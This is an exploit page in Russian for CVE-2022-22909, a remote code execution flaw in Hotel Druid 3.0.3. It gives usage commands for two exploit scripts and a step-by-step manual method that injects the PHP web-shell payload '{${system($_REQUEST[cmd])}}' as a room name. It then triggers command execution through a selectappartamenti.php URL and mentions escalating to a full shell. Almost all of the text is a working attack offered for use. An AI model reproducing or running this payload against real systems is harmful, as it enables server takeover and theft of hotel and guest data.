
Эксплойты для Hotel Druid 3.0.3 - Удаленное выполнение кода (RCE) CVE-2022-22909
Этот эксплойт создаст новую комнату с PHP-полезной нагрузкой в качестве имени комнаты .
Usage :
$ ./HotelDruidExploit.py -h

$ ./HotelDruidExploit.py -u http://127.0.0.1/hoteldruid

Этот эксплойт сработает, если вы уже знаете имя комнаты .
Usage :
$ ./HotelDruidExploitRoom.py -u "http://127.0.0.1/hoteldruid" -r "abc"

1). Перейдите на страницу Hotel Druid.
2). Нажмите Tables -> Rooms

3). В поле Create New Room добавьте следующий php-код , и нажмите Add.
{${system($_REQUEST[cmd])}}

4). Вы увидите новую комнату с нашей полезной нагрузкой в поле имени "Room" .

5). Перейдите по ссылке ниже, и вы получите выполнение команды , Позже вы сможете получить полную оболочку
http://127.0.0.1/hoteldruid/dati/selectappartamenti.php?cmd=whoami
Note : Измените IP на IP вашего целевого hoteldruid.
Эта уязвимость возникает из-за того, что имена комнат сохраняются внутри /var/www/html/hoteldruid/dati/selectappartamenti.php

А selectappartamenti.php — это PHP-файл, поэтому любой PHP-код внутри этого файла будет выполнен сервером.